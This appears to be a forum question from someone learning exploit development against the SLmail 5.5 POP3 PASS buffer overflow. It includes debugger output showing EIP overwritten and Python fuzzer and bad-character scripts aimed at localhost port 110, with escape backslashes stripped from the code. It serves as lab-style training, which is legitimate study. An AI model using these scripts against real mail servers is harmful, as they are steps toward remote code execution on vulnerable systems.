What are C2 & C3 characters in SLmail bad characters?

According to this site, there are 3 bad characters in SLmail v5.5

https://www.whitelist1.com/2016/11/xstack-overflow-1-exploiting-slmail.html

To sum it up, there are 3 bad characters that being interpreted
literally by the compiler, their immediate effect consist on
truncating the normal execution of the program. Once removed, the
buffer is executed correctly.

0x00 = Null Byte = terminates a string copy operation. 0x0D = Carriage
Return = resets to the beginning of a line of text. 0x0A = Line Feed =
advances by the space of one line.

However, I don’t get similar result after removing these 3 characters.

Here is the screenshot of my Immunity. Notice that there are a lot of C2 & C3 characters in it.

Registers

EAX 00000000
ECX 01C89EF0 ASCII "20/10/03 00:25:07 P3-0001: Illegal command 0(AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

ESP 01C8A154
EBP 41414141
EIP 42424242

Stack

01C8A148   41414141  AAAA
01C8A14C   41414141  AAAA
01C8A150   42424242  BBBB
01C8A154   04030201  
01C8A158   08070605  
01C8A15C   0E0C0B09  ..

Hex dump

01C8A134  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
01C8A144  41 41 41 41 41 41 41 41 41 41 41 41 42 42 42 42  AAAAAAAAAAAABBBB
01C8A154  01 02 03 04 05 06 07 08 09 0B 0C 0E 0F 10 11 12  ..
01C8A164  13 14 15 16 17 18 19 1A 1B 1C 1D 1E 1F 20 21 22   !"
01C8A174  23 24 25 26 27 28 29 2A 2B 2C 2D 2E 2F 30 31 32  #$%&'()*+,-./012
01C8A184  33 34 35 36 37 38 39 3A 3B 3C 3D 3E 3F 40 41 42  3456789:;<=>?@AB
01C8A194  43 44 45 46 47 48 49 4A 4B 4C 4D 4E 4F 50 51 52  CDEFGHIJKLMNOPQR
01C8A1A4  53 54 55 56 57 58 59 5A 5B 5C 5D 5E 5F 60 61 62  STUVWXYZ[]^_`ab
01C8A1B4  63 64 65 66 67 68 69 6A 6B 6C 6D 6E 6F 70 71 72  cdefghijklmnopqr
01C8A1C4  73 74 75 76 77 78 79 7A 7B 7C 7D 7E 7F C2 80 C2  stuvwxyz{|}~€Â
01C8A1D4  81 C2 82 C2 83 C2 84 C2 85 C2 86 C2 87 C2 88 C2  ‚ƒ„…†‡ˆÂ
01C8A1E4  89 C2 8A C2 8B C2 8C C2 8D C2 8E C2 8F C2 90 C2  ‰ÂŠÂ‹ÂŒÂÂŽÂÂÂ
01C8A1F4  91 C2 92 C2 93 C2 94 C2 95 C2 96 C2 97 C2 98 C2  ‘’“”•–—˜Â
01C8A204  99 C2 9A C2 9B C2 9C C2 9D C2 9E C2 9F C2 A0 C2  ™ÂšÂ›ÂœÂžŸ Â
01C8A214  A1 C2 A2 C2 A3 C2 A4 C2 A5 C2 A6 C2 A7 C2 A8 C2  ¡Â¢Â£Â¤Â¥Â¦Â§Â¨Â
01C8A224  A9 C2 AA C2 AB C2 AC C2 AD C2 AE C2 AF C2 B0 C2  ©ÂªÂ«Â¬Â­Â®Â¯Â°Â
01C8A234  B1 C2 B2 C2 B3 C2 B4 C2 B5 C2 B6 C2 B7 C2 B8 C2  ±Â²Â³Â´ÂµÂ¶Â·Â¸Â
01C8A244  B9 C2 BA C2 BB C2 BC C2 BD C2 BE C2 BF C3 80 C3  ¹ÂºÂ»Â¼Â½Â¾Â¿Ã€Ã
01C8A254  81 C3 82 C3 83 C3 84 C3 85 C3 86 C3 87 C3 88 C3  ÂÃÄÅÆÇÈÃ
01C8A264  89 C3 8A C3 8B C3 8C C3 8D C3 8E C3 8F C3 90 C3  ‰ÃŠÃ‹ÃŒÃÃŽÃÃÃ
01C8A274  91 C3 92 C3 93 C3 94 C3 95 C3 96 C3 97 C3 98 C3  ‘ÒÓÔÕÖ×ØÃ
01C8A284  99 C3 9A C3 9B C3 9C C3 9D C3 9E C3 9F C3 A0 C3  ™ÃšÃ›ÃœÃÞßàÃ
01C8A294  A1 C3 A2 C3 A3 C3 A4 C3 A5 C3 A6 C3 A7 C3 A8 C3  ¡Ã¢Ã£Ã¤Ã¥Ã¦Ã§Ã¨Ã
01C8A2A4  A9 C3 AA C3 AB C3 AC C3 AD C3 AE C3 AF C3 B0 C3  ©ÃªÃ«Ã¬Ã­Ã®Ã¯Ã°Ã
01C8A2B4  B1 C3 B2 C3 B3 C3 B4 C3 B5 C3 B6 C3 B7 C3 B8 C3  ±Ã²Ã³Ã´ÃµÃ¶Ã·Ã¸Ã
01C8A2C4  B9 C3 BA C3 BB C3 BC C3 BD C3 BE C3 BF 29 20 69  ¹ÃºÃ»Ã¼Ã½Ã¾Ã¿) i
01C8A2D4  6E 20 73 74 61 74 65 20 35 00 00 00 00 00 00 00  n state 5.......
01C8A2E4  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
01C8A2F4  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................

Update

I was using this code as a reference.

https://github.com/coffeecoco/slmail/blob/master/pop3-pass-fuzz.py

But since that was written for Python 2 and I’m using Python 3, I’ve modified the code a little bit as they’re not really compatible with each other.

script 1 as a fuzzer

#!/usr/bin/python

import socket

buffer=["A"]
counter=100
while len(buffer) <= 30:
    buffer.append("A"*counter)
    counter=counter+200

for string in buffer:
    print("Fuzzing PASS with %s bytes" % len(string))
    s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    connect=s.connect(('127.0.0.1', 110))
    s.recv(1024)
    s.send(b'USER wolfrn')
    s.recv(1024)
    s.send(b'PASS ' + string.encode() + b'rn')
    s.send(b'QUITrn')
s.close()

script 2 – to identify bad characters

screenshot above was generated with this code

#!/usr/bin/python

import socket

# x00, x0a, and x0d have been removed
badCharacters = (
"x01x02x03x04x05x06x07x08x09x0bx0cx0ex0f"
"x10x11x12x13x14x15x16x17x18x19x1ax1bx1cx1dx1ex1f"
"x20x21x22x23x24x25x26x27x28x29x2ax2bx2cx2dx2ex2f"
"x30x31x32x33x34x35x36x37x38x39x3ax3bx3cx3dx3ex3f"
"x40x41x42x43x44x45x46x47x48x49x4ax4bx4cx4dx4ex4f"
"x50x51x52x53x54x55x56x57x58x59x5ax5bx5cx5dx5ex5f"
"x60x61x62x63x64x65x66x67x68x69x6ax6bx6cx6dx6ex6f"
"x70x71x72x73x74x75x76x77x78x79x7ax7bx7cx7dx7ex7f"
"x80x81x82x83x84x85x86x87x88x89x8ax8bx8cx8dx8ex8f"
"x90x91x92x93x94x95x96x97x98x99x9ax9bx9cx9dx9ex9f"
"xa0xa1xa2xa3xa4xa5xa6xa7xa8xa9xaaxabxacxadxaexaf"
"xb0xb1xb2xb3xb4xb5xb6xb7xb8xb9xbaxbbxbcxbdxbexbf"
"xc0xc1xc2xc3xc4xc5xc6xc7xc8xc9xcaxcbxccxcdxcexcf"
"xd0xd1xd2xd3xd4xd5xd6xd7xd8xd9xdaxdbxdcxddxdexdf"
"xe0xe1xe2xe3xe4xe5xe6xe7xe8xe9xeaxebxecxedxeexef"
"xf0xf1xf2xf3xf4xf5xf6xf7xf8xf9xfaxfbxfcxfdxfexff"
)

string = "A" * 2606 + "B" * 4 + badCharacters

print("Fuzzing PASS with %s bytes" % len(string))
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=s.connect(('127.0.0.1', 110))
s.recv(1024)
s.send(b'USER wolfrn')
s.recv(1024)
s.send(b'PASS ' + string.encode() + b'rn')
s.send(b'QUITrn')
s.close()